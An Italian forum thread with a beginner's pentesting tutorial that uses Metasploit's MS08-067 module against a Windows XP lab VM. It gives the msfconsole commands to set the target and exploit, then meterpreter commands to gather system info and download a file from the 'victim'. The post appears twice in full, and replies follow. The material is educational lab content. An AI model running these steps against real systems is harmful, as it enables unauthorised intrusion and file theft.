Guida Guida Pentesting Parte 1

Stato
Discussione chiusa ad ulteriori risposte.

dalvik

Utente Bronze
7 Giugno 2016
30
6
2
36
Ultima modifica:
Questa guida è scritta con l'obiettivo di condividere le mie conoscenze in ambito pentesting.
Non pretendo di insegnare nulla a chi queste cose già le sa e magari ne trova anche semplici alcune, se non tutte.
Questo post, e i successivi che pubblicherò ogni volta che ho un pò di tempo, vogliono essere un modo per aprire delle discussioni, per poter scambiare idee e conoscenze sull'argomento, e magari potranno anche essere utili a chi è alle prime armi(parliamoci chiaro, TUTTI, chi più ,chi meno, siamo qui per imparare).

Bene dopo questa breve introduzione, iniziamo:

Occorrente:

- Virtual Box
- Macchina virtuale Kali Linux 2
- Macchina virtuale windows XP(antivirus e firewall disattivati, per questa volta ;) )
- Entrambe le VM collegate in modalità di rete: scheda con bridge


Metasploit, per chi non ancora non lo sapesse, è un Framework scritto in Ruby che nasce come strumento di aiuto ai programmatori per il development di exploit. Ora, grazie ai numerosi sviluppatori che collaborano al progetto, è praticamente una suite di strumenti gigantesca, estremamente potente e flessibile, che permette di automatizzare molte procedure di exploiting(se non tutte) e si trova alla versione 4.

Link pagina ufficiale: https://www.metasploit.com/
Wikipedia: https://it.wikipedia.org/wiki/Metasploit_Project

Non mi soffermerò sull'installazione, sappiate comunque che su Kali Linux la si trova installata di default al path: /usr/share/metasploit-framework/

Ci sono molte interfacce di gestione con cui interagire con Metasploit: a riga di comando, da browser, da interfaccia grafica ( però mi sembra solo nella versione a pagamento ). Io mi soffermerò sull'interfaccia a riga di comando, che è l'unica che uso.

Per aprire metasploit, recarsi nella cartella di installazione di metasploit ed eseguire il comando

# ./msfconsole

Ricordatevi che dovrete attivare il servizio "postgresql" sulla kali, poichè metasploit ha anche un DB che funziona con PostGreSql, altrimenti metasploit funzionerà lo stesso, ma vi mostrerà un errore.

# systemctl start postgresql

Ok, una volta che il framework si è caricato vi mostrerà un banner, e una riga di comando così:

msf>

Diamo qualche comando:

msf> show

show permette di elencare tutte le risorse. Validi parametri sono: all,encoders,nops,exploits,payloads,auxiliary,plugins,info,options. Dare "show -h" per l'aiuto.

ogni commando di metasploit, prende come opzione -h che visualizza un help.
poi abbiamo il comando search per cercare l'exploit che ci interessa:

msf> search netapi

Diamo ora il comando "use" per selezionare l'exploit

msf> use exploit/windows/smb/ms08_067_netapi

Visualizziamo le opzioni dell'exploit con il comando

msf> show options

Vediamo che vengono mostrate le opzioni con il loro nome(maiuscolo), a fianco il valore che abbiamo settato, se è obbligatoria(yes o no) e una breve descrizione.
ora impostiamo il target fornendo l'ip della vittima(aprite il terminale windows e date ipconfig)

msf>set RHOST 192.168.1.240

e ora exploitiamo la macchina

msf> exploit

se tutto è andato correttamente, abbiamo aperto una shell meterpreter!

diamo qualche comando, inanzitutto vediamo quelli disponibili:

meterpreter> help

Diamo

meterpreter> sysinfo

per fare un po di information gathering...

meterpreter> getuid

per ottenere il nome utente con cui siamo loggati.

ora possiamo controllare tutti i file sul computer vittima, e ad esempio scaricarne uno:

meterpreter> download C:/Documents and Settings/dalvik/Desktop/segreto/segreto.txt

il file si troverà nella vostra directory di lavoro, data dal comando

meterpreter> getlwd

per mettere in background la sessione di meterpreter per poi poterla riprenderla in seguito, diamo:

meterpreter> background

per riaprirla

msf> sessions -i 1

Oggi abbiamo descritto lo sfruttamento di una vlnerabilità che ci permette di hackerare un Pc con windows XP che si trovi nella nostra rete LAN.

Ci sono tantissime cose da fare una volta aperta una shell di Meterpter, il limite ce lo da solo la nostra fantasia!

Per il momento è tutto, questa era solo un inizio, nei prossimi articoli parleremo di escalation di privilegi, rubare credenziali, bypassing di antivirus, e tanto tanto altro. Alla prossima!

Link exploit: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Link Bollettino di sicurezza Microsoft: https://technet.microsoft.com/en-us/library/security/ms08-067.aspx?f=255&MSPPError=-2147217396

P.S. So che la formattazione del testo non è un granchè ma sono le 3 di notte e ho sonno :matto: dalla prossima guida formatterò il testo in maniera migliore. Buonanotte ragazzi!

Schermata da 2016-09-14 02-04-44.png
Schermata da 2016-09-14 02-23-26.png
Schermata da 2016-09-14 02-25-31.png
Schermata da 2016-09-14 02-35-32.png
 
  • Mi piace
Reazioni: All3xJ
Questa guida è scritta con l'obiettivo di condividere le mie conoscenze in ambito pentesting.
Non pretendo di insegnare nulla a chi queste cose già le sa e magari ne trova anche semplici alcune, se non tutte.
Questo post, e i successivi che pubblicherò ogni volta che ho un pò di tempo, vogliono essere un modo per aprire delle discussioni, per poter scambiare idee e conoscenze sull'argomento, e magari potranno anche essere utili a chi è alle prime armi(parliamoci chiaro, TUTTI, chi più ,chi meno, siamo qui per imparare).

Bene dopo questa breve introduzione, iniziamo:

Occorrente:

- Virtual Box
- Macchina virtuale Kali Linux 2
- Macchina virtuale windows XP(antivirus e firewall disattivati, per questa volta ;) )
- Entrambe le VM collegate in modalità di rete: scheda con bridge


Metasploit, per chi non ancora non lo sapesse, è un Framework scritto in Ruby che nasce come strumento di aiuto ai programmatori per il development di exploit. Ora, grazie ai numerosi sviluppatori che collaborano al progetto, è praticamente una suite di strumenti gigantesca, estremamente potente e flessibile, che permette di automatizzare molte procedure di exploiting(se non tutte) e si trova alla versione 4.

Link pagina ufficiale: https://www.metasploit.com/
Wikipedia: https://it.wikipedia.org/wiki/Metasploit_Project

Non mi soffermerò sull'installazione, sappiate comunque che su Kali Linux la si trova installata di default al path: /usr/share/metasploit-framework/

Ci sono molte interfacce di gestione con cui interagire con Metasploit: a riga di comando, da browser, da interfaccia grafica ( però mi sembra solo nella versione a pagamento ). Io mi soffermerò sull'interfaccia a riga di comando, che è l'unica che uso.

Per aprire metasploit, recarsi nella cartella di installazione di metasploit ed eseguire il comando

# ./msfconsole

Ricordatevi che dovrete attivare il servizio "postgresql" sulla kali, poichè metasploit ha anche un DB che funziona con PostGreSql, altrimenti metasploit funzionerà lo stesso, ma vi mostrerà un errore.

# systemctl start postgresql

Ok, una volta che il framework si è caricato vi mostrerà un banner, e una riga di comando così:

msf>

Diamo qualche comando:

msf> show

show permette di elencare tutte le risorse. Validi parametri sono: all,encoders,nops,exploits,payloads,auxiliary,plugins,info,options. Dare "show -h" per l'aiuto.

ogni commando di metasploit, prende come opzione -h che visualizza un help.
poi abbiamo il comando search per cercare l'exploit che ci interessa:

msf> search netapi

Diamo ora il comando "use" per selezionare l'exploit

msf> use exploit/windows/smb/ms08_067_netapi

Visualizziamo le opzioni dell'exploit con il comando

msf> show options

Vediamo che vengono mostrate le opzioni con il loro nome(maiuscolo), a fianco il valore che abbiamo settato, se è obbligatoria(yes o no) e una breve descrizione.
ora impostiamo il target fornendo l'ip della vittima(aprite il terminale windows e date ipconfig)

msf>set RHOST 192.168.1.240

e ora exploitiamo la macchina

msf> exploit

se tutto è andato correttamente, abbiamo aperto una shell meterpreter!

diamo qualche comando, inanzitutto vediamo quelli disponibili:

meterpreter> help

Diamo

meterpreter> sysinfo

per fare un po di information gathering...

meterpreter> getuid

per ottenere il nome utente con cui siamo loggati.

ora possiamo controllare tutti i file sul computer vittima, e ad esempio scaricarne uno:

meterpreter> download C:/Documents and Settings/dalvik/Desktop/segreto/segreto.txt

il file si troverà nella vostra directory di lavoro, data dal comando

meterpreter> getlwd

per mettere in background la sessione di meterpreter per poi poterla riprenderla in seguito, diamo:

meterpreter> background

per riaprirla

msf> sessions -i 1

Oggi abbiamo descritto lo sfruttamento di una vlnerabilità che ci permette di hackerare un Pc con windows XP che si trovi nella nostra rete LAN.

Ci sono tantissime cose da fare una volta aperta una shell di Meterpter, il limite ce lo da solo la nostra fantasia!

Per il momento è tutto, questa era solo un inizio, nei prossimi articoli parleremo di escalation di privilegi, rubare credenziali, bypassing di antivirus, e tanto tanto altro. Alla prossima!

Link exploit: https://www.rapid7.com/db/modules/exploit/windows/smb/ms08_067_netapi
Link Bollettino di sicurezza Microsoft: https://technet.microsoft.com/en-us/library/security/ms08-067.aspx?f=255&MSPPError=-2147217396

P.S. So che la formattazione del testo non è un granchè ma sono le 3 di notte e ho sonno :matto: dalla prossima guida formatterò il testo in maniera migliore. Buonanotte ragazzi!

Visualizza allegato 18710 Visualizza allegato 18711 Visualizza allegato 18714 Visualizza allegato 18715
Bravo sarà utile ai novizi ;)

Inviata da ALE-L21 tramite app ufficiale di Inforge.net
 
sarebbe ancora meglio di fare una cosa del genere alle 0300 PM invece di AM. cosi facendo, magari riesci a fare tipo.. /codice/ -- /screenshot/ e cosi via. un noob che deve fare scroll UP, scroll DOWN per vedere se coincidono le schermate.. comunque BRAVO!(per una guida su un tool del 2007) :D
 
setto tutta la rete bridge metto gli ip se pingo da xp su kali riceve viceversa no perche? ho disattivato anche il firewall da cmd xp ma nulla!
 
setto tutta la rete bridge metto gli ip se pingo da xp su kali riceve viceversa no perche? ho disattivato anche il firewall da cmd xp ma nulla!
Il ping è bidirezionale, se ricevi risposta da kali quando fai il ping da xp deve funzionare per forza anche il contrario..
 
Scusate avrei bisogno di chiarimenti riguardanti la metasploit e le vulnerabilità..
metasploit viene quindi identificata come macchina che permette all'informatico di poterla exploitare(bucare)?o semplicemente una distribuzione che aiuta l 'informatico tramite exploit di default testare altri SO..metasploit serve per fare pentesting?
Vulnerabilità...forse è una domanda stupida ma vorrei poterci ragionare un po su.. per vulnerabilità s'intende una falla /bug all'interno di un programma/pagina web/SO ecc ma per riuscire a scoprire tali vulnerabilità oltre a (credo) radicate conoscenze informatiche come si fa a scovarle? tramite il pentesting?se si,come si effettua un pentesting mirato al cercare vulnerabilità?da dove s'inizia a ragionare su una possibile vulnerabilità?

(scusate la mia ignoranza ma e una cosa che finita la scuola da informatico mi ha veramente abbassionato molto ma non riesco ad avere una startup di partenza non so da dove partire )
 
Ciao ho seguito le istruzioni ma il non mi apre il meterpreter dopo il comando exploit mi da:

[ * ] Exploit completed, but no session was created.

Edit:
Ho lanciato un "check" mi da:
[*] 192.168.1.12:445 The target is not exploitable.
 
Stato
Discussione chiusa ad ulteriori risposte.